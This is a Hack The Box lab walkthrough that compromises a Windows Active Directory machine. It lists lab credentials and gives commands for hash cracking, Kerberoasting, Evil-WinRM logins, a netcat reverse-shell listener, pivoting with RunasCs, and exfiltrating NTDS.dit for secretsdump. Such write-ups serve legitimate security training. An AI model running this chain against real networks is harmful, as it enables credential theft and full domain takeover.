# Vouyer HTB – Pentest Walkthrough

**Target:** Windows Machine  

---

## General Info

| Field       | Details          |
|-------------|------------------|
| **IP**      | 10.10.11.76      |

---

## Credentials

| User            | Password           |
|-----------------|-------------------|
| ryan.naylor     | HollowOct31Nyt    |
| svc_ldap        | M1XyC9pW7qT5Vn    |
| svc_iis         | N5pXyV1WqM7CZ8    |

---

## Open Ports (Nmap)

| Port  | Service        |
|-------|---------------|
| 53    | domain        |
| 88    | kerberos-sec  |
| 135   | msrpc         |
| 139   | netbios-ssn   |
| 189   | ldap          |
| 445   | microsoft-ds  |
| 464   | kpasswd5      |
| 593   | ncacn_http    |
| 636   | tcpwrapped    |
| 2222  | ssh           |
| 3268  | ldap          |
| 3269  | tcpwrapped    |
| 5985  | http          |

Potential SMB Access: **Yes**  

---

## Attack Path Overview

1. **Recon & Initial Enumeration**  
   - Ran Nmap scan to identify open ports.  
   - Found Active Directory, Kerberos, SMB, and LDAP services.  
   - Imported enumeration data into **BloodHound** for AD mapping.

---

2. **Credential Discovery**  
   - Used provided credentials to generate a Kerberos ticket.  
   - Found `ryan.naylor` in **First-Line Support** group.  
   - Group had access to an encrypted ZIP containing credentials.  
   - Extracted ZIP password:  
     ```bash
     office2john encrypted.zip > hash
     john --wordlist=rockyou.txt hash
     # Password: football
     ```  
   - Decrypted archive → new credentials:  
     - `svc_ldap / M1XyC9pW7qT5Vn`  
     - `svc_iis / N5pXyV1WqM7CZ8`

---

3. **Privilege Escalation via Kerberos**  
   - `svc_ldap` → `lacey.miller@voleur.htb` had **GenericWrite** permissions.  
   - Performed targeted Kerberoasting to dump hashes for `lacey` and `svc_winrm`.  
   - Obtained `svc_winrm` hash.  

---

4. **Initial Shell Access**  
   - Created `.ccache` ticket for `svc_winrm`.  
   - Logged in with **Evil-WinRM**:  
     ```bash
     evil-winrm -i 10.10.11.76 -u svc_winrm -p <PASSWORD>
     ```  
   - Retrieved `user.txt`.

---

5. **Lateral Movement**  
   - Uploaded `RunasCs.exe` to pivot from `svc_winrm` → `svc_ldap` (direct login blocked).  
   - Started a reverse shell listener:  
     ```bash
     nc -lvnp 6666
     RunasCs.exe -u svc_ldap ...
     ```  
   - Discovered **deleted user** `todd.wolfe`.  
   - Restored account and generated Kerberos ticket.  
   - Enumerated shares with `impacket-smbclient`.  
   - Found DPAPI-encrypted material + keys → decrypted using `impacket-dpapi`.  
   - Extracted **jeremy.combs** credentials.

---

6. **Privilege Escalation (More Pivots)**  
   - Generated Kerberos ticket for `jeremy.combs`.  
   - Found additional SMB access and loot:  
     - `id_rsa` private key  
     - `Note.txt.txt`  

   - Fixed SSH key permissions:  
     ```bash
     chmod 600 id_rsa
     ```  
   - Used SSH with key to log in as `svc_backup` over port 2222.

---

7. **Domain Admin Access**  
   - Located `SYSTEM` and `NTDS.dit` files.  
   - Exfiltrated via netcat:  
     ```bash
     nc -lvnp 8888 > SYSTEM
     nc -lvnp 8888 > ntds.dit
     ```  
   - Parsed with `impacket-secretsdump`:  
     ```bash
     secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
     ```  
   - Cracked Administrator NT hash and generated Kerberos ticket.  
   - Logged in as Administrator via Evil-WinRM:  
     ```bash
     evil-winrm -i 10.10.11.76 -u Administrator -p <PASSWORD>
     ```  
   - Retrieved `root.txt`.

---

## Attack Chain Summary

| Step | Action |
|------|--------|
| 1    | Start with low-priv `ryan.naylor` creds. |
| 2    | AD mapping with BloodHound. |
| 3    | Decrypted ZIP → gained `svc_ldap` and `svc_iis`. |
| 4    | Kerberoasting → obtained `svc_winrm` hash. |
| 5    | Evil-WinRM → shell as `svc_winrm`. |
| 6    | Pivot to `svc_ldap` via RunasCs. |
| 7    | Restored `todd.wolfe`, dumped DPAPI material. |
| 8    | Decrypted creds for `jeremy.combs`. |
| 9    | SSH to `svc_backup` with `id_rsa`. |
| 10   | NTDS dump → Administrator hash. |
| 11   | Evil-WinRM → Administrator shell. |

---

## Key Takeaways

- **Kerberoasting + DPAPI** are a powerful combo for privilege escalation.  
- **RunasCs** was essential for bypassing blocked logins and lateral movement.  
- Restoring deleted users can provide unexpected attack paths.  
- SMB share enumeration + BloodHound pathfinding were critical in this engagement.

---
